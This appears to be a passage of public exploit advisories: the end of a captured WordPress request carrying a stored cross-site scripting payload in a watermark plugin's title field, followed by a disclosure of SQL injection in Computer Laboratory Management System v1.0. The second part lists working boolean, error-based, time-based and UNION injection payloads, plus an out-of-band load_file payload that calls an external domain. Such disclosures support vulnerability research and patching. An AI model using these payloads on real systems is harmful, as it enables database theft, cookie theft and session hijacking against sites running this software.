_wpnonce=99a1d1e63a&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dwatermark&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=watermark&original_post_status=auto-draft&referredby=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&_wp_original_http_referer=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&auto_draft=1&post_ID=35&meta-box-order-nonce=ea875c0c6f&closedpostboxesnonce=d29be25ad8&post_title=&samplepermalinknonce=1e667edd3a&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=03&jj=22&aa=2024&hh=16&mn=25&ss=23&hidden_mm=03&cur_mm=03&hidden_jj=22&cur_jj=22&hidden_aa=2024&cur_aa=2024&hidden_hh=16&cur_hh=16&hidden_mn=25&cur_mn=25&original_publish=Publish&publish=Publish&tax_input%5BCategories%5D%5B%5D=0&post_name=&custom_meta_box_nonce=d1322f94a0&watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&img_sizes%5B%5D=thumbnail&img_sizes%5B%5D=medium&img_sizes%5B%5D=large&img_sizes%5B%5D=full&txt_type=ARIAL.TTF&rgb=38%2C1%2C24&txt_size=8&color=%23260118&rotation=&opicity=100&position=top&destance_x=&mesaure_x=px&padding=&mesaure_y=px&background=yes&rgb_bg=255%2C0%2C0&bg_destance_x=&bg_padding=&color_bg=%23ff0000&image=&img_rotation=&img_opicity=100&img_position=top&img_size=4&img_destance_x=&img_mesaure_x=px&img_padding=&img_mesaure_y=px </code></pre>

<pre><code># Title: Computer Laboratory Management System v1.0 - Multiple-SQLi # Author: nu11secur1ty # Date: 03/28/2024 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 # Reference: https://portswigger.net/web-security/sql-injection # Description: The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN (2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=user/manage_user&id=7''' AND (SELECT 1734 FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM (SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: page=user/manage_user&id=-2854' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL# --- </code></pre>